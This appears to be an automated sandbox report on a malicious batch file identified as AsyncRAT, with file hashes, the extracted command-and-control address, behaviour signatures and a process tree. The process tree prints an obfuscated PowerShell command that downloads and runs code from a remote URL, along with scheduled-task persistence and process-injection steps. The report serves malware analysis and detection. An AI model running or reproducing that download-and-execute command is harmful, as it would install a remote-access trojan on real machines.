Analysis
-
max time kernel
79s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
08-10-2022 08:19
Static task
static1
Behavioral task
behavioral1
Sample
OutPut2.bat
Resource
win7-20220812-en
General
-
Target
OutPut2.bat
-
Size
21KB
-
MD5
c32b1f1bb8eda7a1e148c1cdf014f23b
-
SHA1
af0cc28285fc57632751f970ba3040bb1af2faa0
-
SHA256
8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6
-
SHA512
f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e
-
SSDEEP
96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
Default
andojan.ddns.net:6606
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/3092-155-0x0000000000400000-0x0000000000414000-memory.dmp asyncrat behavioral2/memory/3092-156-0x000000000040EBAE-mapping.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 4468 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3308 set thread context of 3092 3308 powershell.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4252 schtasks.exe 4408 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 4024 taskkill.exe 1068 taskkill.exe 1836 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4468 powershell.exe 4468 powershell.exe 3308 powershell.exe 3308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 4024 taskkill.exe Token: SeDebugPrivilege 1068 taskkill.exe Token: SeDebugPrivilege 1836 taskkill.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 3092 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4548 wrote to memory of 4904 4548 cmd.exe 85 PID 4548 wrote to memory of 4904 4548 cmd.exe 85 PID 4904 wrote to memory of 4468 4904 cmd.exe 86 PID 4904 wrote to memory of 4468 4904 cmd.exe 86 PID 4468 wrote to memory of 4304 4468 powershell.exe 94 PID 4468 wrote to memory of 4304 4468 powershell.exe 94 PID 4304 wrote to memory of 2072 4304 WScript.exe 95 PID 4304 wrote to memory of 2072 4304 WScript.exe 95 PID 2072 wrote to memory of 4252 2072 cmd.exe 97 PID 2072 wrote to memory of 4252 2072 cmd.exe 97 PID 2072 wrote to memory of 4408 2072 cmd.exe 98 PID 2072 wrote to memory of 4408 2072 cmd.exe 98 PID 2072 wrote to memory of 4024 2072 cmd.exe 99 PID 2072 wrote to memory of 4024 2072 cmd.exe 99 PID 2072 wrote to memory of 1068 2072 cmd.exe 100 PID 2072 wrote to memory of 1068 2072 cmd.exe 100 PID 2072 wrote to memory of 1836 2072 cmd.exe 101 PID 2072 wrote to memory of 1836 2072 cmd.exe 101 PID 3752 wrote to memory of 4864 3752 WScript.exe 104 PID 3752 wrote to memory of 4864 3752 WScript.exe 104 PID 4864 wrote to memory of 3308 4864 cmd.exe 106 PID 4864 wrote to memory of 3308 4864 cmd.exe 106 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 3092 3308 powershell.exe 107 PID 3308 wrote to memory of 1956 3308 powershell.exe 108 PID 3308 wrote to memory of 1956 3308 powershell.exe 108
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)2⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\App\xx.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
PID:4252
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
PID:4408
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM schtasks.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM powershell.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\App\cAppc.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn det /f4⤵PID:1956
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5b385ec653fef60833ca284dcfff71bff
SHA1612981ecf896a7ef09496894d8059f6a9570cf2a
SHA25676a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8
SHA51200f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81
-
Filesize
81B
MD56d2d36c3cc7bea993801e5febf7db1c8
SHA1962ca57c247334f79d40e55aa30612c5dfe96c12
SHA25683c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68
SHA512751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d
-
Filesize
5KB
MD55392a92ca835d8812a79a1ee6dac0892
SHA1cb56f654f054542c538f492c4d437d65e4f9bba7
SHA2564ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5
SHA51202175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d
-
Filesize
260B
MD515b09a88be68cc160232d8766f7e3be7
SHA1b3468aaafd099c639405574b719a201b8df00b02
SHA256d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2
SHA5120cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460
-
Filesize
4KB
MD51de9b452f5231a8281209d61a101bcb5
SHA127ea6c5470a58226b7a1ab8986d3d0bec87ae3eb
SHA2560920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64
SHA512e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD541d515d5c13eee8dac49179444a89124
SHA115381e59e572585c54d3cc5e3f061131e5d98673
SHA256767db2d9cc84af3c573adfc4345b42c646091926fc42eb106d1fe7cfb976b49b
SHA512f1caab2d5acc7ef9a41685788c009a6bb7af1423c20fd652ab858ec64405a6158a6de0e9ee09c519d44317197864c56620556ddba9e967b926095b1e45795c43